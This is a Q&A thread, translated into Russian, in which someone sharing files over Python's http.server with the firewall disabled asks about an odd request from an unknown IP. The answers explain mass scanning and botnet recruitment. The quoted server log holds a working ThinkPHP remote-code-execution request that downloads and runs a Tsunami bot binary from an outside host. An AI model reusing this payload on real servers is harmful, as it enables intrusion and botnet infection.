Python 3 http.server - Странный IP-адрес пытался подключить мой сервер

Question

Несколько минут назад я запустил сервер на базе python, чтобы поделиться несколькими файлами с моим другом. Я отключил брандмауэр Windows, чтобы он мог подключаться и скачивать файлы. Когда кто-то пытается подключиться к серверу, Python показывает свой IP-адрес и запрошенный путь.

Кто-то, кого я не знаю, пытался получить мой index.php и запустить wget. Я проверил их IP-адрес, и кажется, что они из Японии. Итак, как этот человек узнал мой IP-адрес и попытался подключиться к моему компьютеру? Я только поделился этим с моим другом на WhatsApp.

Я делал это много раз раньше, и это первый раз, когда происходит подобное.

61.192.55.32 - - [06/Jan/2019 01:27:16] code 400, message Bad request syntax ("GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://185.255.25.168/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86' HTTP/1.1")
61.192.55.32 - - [06/Jan/2019 01:27:16] "GET /index.php?s=/index/       hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://185.255.25.168/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86' HTTP/1.1" 400 -

Answer 1

Многие люди используют такие инструменты, как Masscan с пользовательскими сценариями, которые ищут уязвимые веб-серверы. В большинстве случаев этот вид сценария пытается получить обратные оболочки в попытке создать армию ботнетов. Есть некоторые сведения о том, что Windows-машины, подключенные к Интернету, были взломаны до того, как SO завершит установку.

Answer 2

Вот почему вы не должны отключать брандмауэр: среднее время, которое требуется от выхода в Интернет без защиты кому-то, пытающемуся проникнуть в вашу систему, в лучшем случае составляет минуты.

Вместо этого вы должны узнать IP своего друга и просто разрешить этот единственный IP. И если у вашего друга нет статического IP-адреса, удалите его после завершения тестирования, потому что кто-то другой может получить этот адрес позже.

Answer 3

Это довольно распространенная техника взлома. Хакеры будут сканировать Интернет, используя, казалось бы, случайные IP-адреса (и случайно выбирают ваши) и искать открытые порты (обычно это обычные порты, такие как 22, 80 и 443) и запускать ряд общих эксплойтов, пытаясь получить контроль над машиной.

Многие ботнеты были созданы путем простой атаки случайных IP-адресов в надежде, что у них будет маршрутизатор с именем пользователя и паролем по умолчанию, все еще установленными на их маршрутизаторе, или с устаревшим программным обеспечением с известными эксплойтами.

В вашем случае, похоже, они надеялись, что на вашем веб-сервере запущена определенная комбинация программного обеспечения PHP. Ваш ip-адрес был, вероятно, одним из тысяч, к которым они запустили один и тот же запрос.